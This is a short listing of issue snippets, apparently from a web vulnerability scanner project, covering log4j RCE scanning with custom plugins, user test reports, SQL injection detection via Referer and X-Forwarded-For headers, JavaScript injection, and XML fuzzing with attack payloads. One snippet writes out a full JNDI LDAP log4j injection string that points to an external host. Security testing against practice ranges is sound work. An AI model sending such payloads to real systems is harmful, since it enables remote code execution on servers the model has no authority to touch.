shaochuyu

How to use custom plugins to perform log4j RCE vulnerability scans？

1

${jndi:ldap://xxx.xxx.xxx.xxxx:80/i/hcSvqI7U/71534c/303r/i9nl/PQ5P8iBh}  Target practice location https://zkaq:[email protected]/ https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd 

分享你的Wscan扫描测试经验！

6

最近在对Wscan进行优化，希望收集各种靶场使用 Wscan 扫描的测试报告。如果你曾经使用过 Wscan 进行扫描测试，无论是在实验室环境还是实际应用中，都非常欢迎你分享你的经验和结果。为保护隐私，请不要包含具体的 IP 地址、域名或其他敏感信息。

提升SQL注入检测能力

2

awvs会针对referer头和x-Forwarded-For检测 他会针对referer植入一个网址 一般是谷歌网址加一堆参数测试 

Since I will inject a section of JavaScript code and automatically click on the link, in case of poor network connection, a network diagnosis page will appear. How to avoid...

@antchfx I want to implement fuzz for XML POST requests, which requires modifying the values of any XML leaf node and replacing them with attack payloads. How to achieve it